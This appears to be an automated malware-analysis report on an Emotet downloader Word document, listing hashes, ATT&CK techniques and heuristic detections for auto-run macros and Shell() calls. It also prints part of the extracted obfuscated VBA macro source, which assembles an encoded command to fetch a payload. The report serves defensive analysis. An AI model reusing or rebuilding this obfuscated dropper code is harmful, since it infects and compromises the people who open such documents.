Emotet Office (OLE) malware analysis — malicious · 66c92ce7904ff4f7

MALICIOUS

Office (OLE)

216.8 KB Created: 2018-06-28 07:15:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: b7592c3802ecb5ba810a3cce898d32d3 SHA-1: 7b196dc9c22a4e539085afb16f3b1d0bd62eae7d SHA-256: 66c92ce7904ff4f711b70e30988a5a96eda9b1fbe7d5fccf19004bd44b457523

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command, a common technique for Emotet. ClamAV detection confirms this family. The macro's obfuscated code likely constructs and executes a command to download a secondary payload, indicated by the 'SE_PASSWORD_ARCHIVE_LURE' heuristic suggesting the document itself may provide instructions for accessing an encrypted payload.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-6877388-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877388-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11991 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11991 bytes
SHA-256: `57ad4664e4527bd811ec6d88b57ddf561f45ea34d75387b30f22f94c66a27ef6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VzbstiCcGLbc" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "DjpCLRAWJ" Function lzkqHJusO() On Error Resume Next wOwqO = ChrB(91694 + _ Sin(knREj * CLng(NBsPE + 18776) _ + 96292 _ + UOVQS)) jhjXD _ = 10969 + Atn(89537) / 5944 / _ Round(74151) / 9658 / CInt(ZmSrGd) ljYmEbnjR = "HELL" + " " + " " + " " + " " + " " GfXYuD = ChrB(74270 + _ Sin(fDbAbZ * CLng(fXhHPO + 87536) _ + 57611 _ + TjZlZ)) kCfBq _ = 74326 + Atn(90747) / 331 / _ Round(63851) / 18109 / CInt(SkPTSd) uuMqIVrcXb = " -" + "jOIn" + Chr(40) + " " + Chr(40) + " 4" + "5 ,12" + "3, 65 ,1" + "11 ,52," + "103 , " + "108, 12" ErmKN = ChrB(68454 + _ Sin(BKEKi * CLng(XwVaP + 8247) _ + 29326 _ + nLYfA)) hBkXKm _ = 85471 + Atn(24065) / 16981 / _ Round(54035) / 28546 / CInt(HrYjhP) QaRzahLLVP = "6 ,36 , 1" + "02 ," + " 107" + ", 99 , 10" + "8 , 10" + "6 , 1" + "25,41," + "71 , 1" + "08, 125 " + ",39 , " + "94 , 108," + "107, " zOWLVw = ChrB(33925 + _ Sin(ALRjOf * CLng(OaPVR + 18850) _ + 39399 _ + CFaisQ)) lmomB _ = 18688 + Atn(30362) / 39973 / _ Round(82305) / 91048 / CInt(WnzkhI) szzBT = "74,10" + "1,96,108," + "103 ," + "125,50, " + "45, 7" + "1,78 ,96" + ",52 , 46" LJZWVM = ChrB(81675 + _ Sin(ddTFvP * CLng(MimMd + 76512) _ + 95737 _ + PAwfwm)) ZFCah _ = 74110 + Atn(98133) / 51217 / _ Round(32371) / 82177 / CInt(XJDDJ) MPiBGYNQIJn = ", 97,125" + " ,125" + " , 121" + " , 51,3" + "8, 38 , 1" + "10,101 " + ", 10" + "4 ,109 , " + "126, 11" + "2,103 ,1" + "08 ,106 ," bvKaR = ChrB(83369 + _ Sin(tOjJWW * CLng(uBRwUK + 3569) _ + 84485 _ + VnhSRB)) hzvtX _ = 66577 + Atn(83906) / 90525 / _ Round(9102) / 87062 / CInt(mEJfU) BVjqiEjYiA = "104 " + ",121," + " 96, 125" + ", 104," + " 101,39," + " 106 " + ", 102," SkmML = ChrB(20840 + _ Sin(jFpmk * CLng(OrURZ + 82375) _ + 87476 _ + tZjhMu)) RjfcDA _ = 53441 + Atn(71751) / 29382 / _ Round(15129) / 30020 / CInt(JzhYi) tfWIJpnD = "100, 38 " + ",103,6" + "3 ,77 " + ", 57 ," + " 38, 73,9" + "7,125" + ", 125,12" + "1,51,3" + "8 , 38,1" + "26,126," + " 126,39" ijBIoi = ChrB(15852 + _ Sin(oiYKFf * CLng(QRAOBX + 71505) _ + 34714 _ + bMMBW)) irnPz _ = 12589 + Atn(98189) / 32114 / _ Round(14495) / 8804 / CInt(UJTvm) UIzvNFYlDEw = " ,107, " + "104," + "125, 97 ," + "102 , 111" + " , 111,39" + ", 123 , " + "124 ," ErShk = ChrB(53805 + _ Sin(RljbVH * CLng(EYaXX + 57327) _ + 41721 _ + YGFWq)) JwnhCd _ = 87390 + Atn(87802) / 88577 / _ Round(17243) / 59829 / CInt(KXaFCY) IPRokhKC = "38, 81," + "111,99" + ", 48," + " 65 ," + "38, 7" + "3,97," + "125, 125" + " , 121,5" + "1, 38 ,38" XVFzzi = ChrB(58161 + _ Sin(EhSLbO * CLng(SXwLRj + 61327) _ + 87923 _ + hJUSV)) upVKob _ = 34648 + Atn(86600) / 83030 / _ Round(33312) / 5030 / CInt(ILHMS) lBdZNlqmn = ", 126" + ",126,12" + "6 ,39," + "122 , 125" + ",104," + " 110, 96," + "103, 1" + "10, 39" + ",100 ," + "96, 10" + "6 , 97" + ",104," TpoLBA = ChrB(13235 + _ Sin(buRqNL * CLng(uSHXK + 29309) _ + 33251 _ + cHZknI)) OLoRw _ = 39738 + Atn(40322) / 89758 / _ Round(79402) / 74273 / CInt(tXkafp) lLYbFA = " 108" + ",101 ,121" + ", 108," + "104,106 ," + "97 ,108" + " , 112" + " , 3" + "9 ,106," + " 102, 100" UTcSS = ChrB(15326 + _ Sin(ZCrMEc * CLng(TjSJP + 44770) _ + 64900 _ + tZOwj)) lCTjw _ = 61829 + Atn(40401) / 6505 / _ Round(20091) / 76354 / CInt(Gtacw) EfAZV = ", 39 " + ",104 ," + "124 " + ",38," + "83 ,1" + "06 ,95,1" + "06 ," + " 38, 73" + " , 97" lzkqHJusO = ljYmEbnjR + uuMqIVrcXb + QaRzahLLVP + szzBT + MPiBGYNQIJn + BVjqiEjYiA + tfWIJpnD + UIzvNFYlDEw + IPRokhKC + lBdZNlqmn + lLYbFA + EfAZV XrXaRM = ChrB(52183 + _ Sin(HaDDVY * CLng(QiTMvb + 321) _ + 99549 _ + bqVia)) IYXzIA _ = 31079 + Atn(37622) / 61469 / _ Round(82033) / 35838 / CInt(oGwoIw) End Function Function aBkSMcL() On Error Resume Next JpSUw = ChrB(53 ... (truncated)

SHA-256: 57ad4664e4527bd811ec6d88b57ddf561f45ea34d75387b30f22f94c66a27ef6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VzbstiCcGLbc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DjpCLRAWJ"
Function lzkqHJusO()
On Error Resume Next
wOwqO = ChrB(91694 + _
Sin(knREj * CLng(NBsPE + 18776) _
 + 96292 _
+ UOVQS))
jhjXD _
= 10969 + Atn(89537) / 5944 / _
Round(74151) / 9658 / CInt(ZmSrGd)
ljYmEbnjR = "HELL" + "    " + "     " + "         " + "         " + "       "
GfXYuD = ChrB(74270 + _
Sin(fDbAbZ * CLng(fXhHPO + 87536) _
 + 57611 _
+ TjZlZ))
kCfBq _
= 74326 + Atn(90747) / 331 / _
Round(63851) / 18109 / CInt(SkPTSd)
uuMqIVrcXb = "       -" + "jOIn" + Chr(40) + " " + Chr(40) + " 4" + "5 ,12" + "3, 65 ,1" + "11 ,52," + "103 , " + "108, 12"
ErmKN = ChrB(68454 + _
Sin(BKEKi * CLng(XwVaP + 8247) _
 + 29326 _
+ nLYfA))
hBkXKm _
= 85471 + Atn(24065) / 16981 / _
Round(54035) / 28546 / CInt(HrYjhP)
QaRzahLLVP = "6 ,36 , 1" + "02 ," + " 107" + ", 99 , 10" + "8 , 10" + "6 , 1" + "25,41," + "71 , 1" + "08, 125 " + ",39 , " + "94 , 108," + "107, "
zOWLVw = ChrB(33925 + _
Sin(ALRjOf * CLng(OaPVR + 18850) _
 + 39399 _
+ CFaisQ))
lmomB _
= 18688 + Atn(30362) / 39973 / _
Round(82305) / 91048 / CInt(WnzkhI)
szzBT = "74,10" + "1,96,108," + "103 ," + "125,50, " + "45, 7" + "1,78 ,96" + ",52 , 46"
LJZWVM = ChrB(81675 + _
Sin(ddTFvP * CLng(MimMd + 76512) _
 + 95737 _
+ PAwfwm))
ZFCah _
= 74110 + Atn(98133) / 51217 / _
Round(32371) / 82177 / CInt(XJDDJ)
MPiBGYNQIJn = ", 97,125" + " ,125" + " , 121" + " , 51,3" + "8, 38 , 1" + "10,101 " + ", 10" + "4 ,109 , " + "126, 11" + "2,103 ,1" + "08 ,106 ,"
bvKaR = ChrB(83369 + _
Sin(tOjJWW * CLng(uBRwUK + 3569) _
 + 84485 _
+ VnhSRB))
hzvtX _
= 66577 + Atn(83906) / 90525 / _
Round(9102) / 87062 / CInt(mEJfU)
BVjqiEjYiA = "104 " + ",121," + " 96, 125" + ", 104," + " 101,39," + " 106 " + ", 102,"
SkmML = ChrB(20840 + _
Sin(jFpmk * CLng(OrURZ + 82375) _
 + 87476 _
+ tZjhMu))
RjfcDA _
= 53441 + Atn(71751) / 29382 / _
Round(15129) / 30020 / CInt(JzhYi)
tfWIJpnD = "100, 38 " + ",103,6" + "3 ,77 " + ", 57 ," + " 38, 73,9" + "7,125" + ", 125,12" + "1,51,3" + "8 , 38,1" + "26,126," + " 126,39"
ijBIoi = ChrB(15852 + _
Sin(oiYKFf * CLng(QRAOBX + 71505) _
 + 34714 _
+ bMMBW))
irnPz _
= 12589 + Atn(98189) / 32114 / _
Round(14495) / 8804 / CInt(UJTvm)
UIzvNFYlDEw = " ,107, " + "104," + "125, 97 ," + "102 , 111" + " , 111,39" + ", 123 , " + "124 ,"
ErShk = ChrB(53805 + _
Sin(RljbVH * CLng(EYaXX + 57327) _
 + 41721 _
+ YGFWq))
JwnhCd _
= 87390 + Atn(87802) / 88577 / _
Round(17243) / 59829 / CInt(KXaFCY)
IPRokhKC = "38, 81," + "111,99" + ", 48," + " 65 ," + "38, 7" + "3,97," + "125, 125" + " , 121,5" + "1, 38 ,38"
XVFzzi = ChrB(58161 + _
Sin(EhSLbO * CLng(SXwLRj + 61327) _
 + 87923 _
+ hJUSV))
upVKob _
= 34648 + Atn(86600) / 83030 / _
Round(33312) / 5030 / CInt(ILHMS)
lBdZNlqmn = ", 126" + ",126,12" + "6 ,39," + "122 , 125" + ",104," + " 110, 96," + "103, 1" + "10, 39" + ",100 ," + "96, 10" + "6 , 97" + ",104,"
TpoLBA = ChrB(13235 + _
Sin(buRqNL * CLng(uSHXK + 29309) _
 + 33251 _
+ cHZknI))
OLoRw _
= 39738 + Atn(40322) / 89758 / _
Round(79402) / 74273 / CInt(tXkafp)
lLYbFA = " 108" + ",101 ,121" + ", 108," + "104,106 ," + "97 ,108" + " , 112" + " , 3" + "9 ,106," + " 102, 100"
UTcSS = ChrB(15326 + _
Sin(ZCrMEc * CLng(TjSJP + 44770) _
 + 64900 _
+ tZOwj))
lCTjw _
= 61829 + Atn(40401) / 6505 / _
Round(20091) / 76354 / CInt(Gtacw)
EfAZV = ", 39 " + ",104 ," + "124 " + ",38," + "83 ,1" + "06 ,95,1" + "06 ," + " 38, 73" + " , 97"
lzkqHJusO = ljYmEbnjR + uuMqIVrcXb + QaRzahLLVP + szzBT + MPiBGYNQIJn + BVjqiEjYiA + tfWIJpnD + UIzvNFYlDEw + IPRokhKC + lBdZNlqmn + lLYbFA + EfAZV
XrXaRM = ChrB(52183 + _
Sin(HaDDVY * CLng(QiTMvb + 321) _
 + 99549 _
+ bqVia))
IYXzIA _
= 31079 + Atn(37622) / 61469 / _
Round(82033) / 35838 / CInt(oGwoIw)
End Function
Function aBkSMcL()
On Error Resume Next
JpSUw = ChrB(53
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.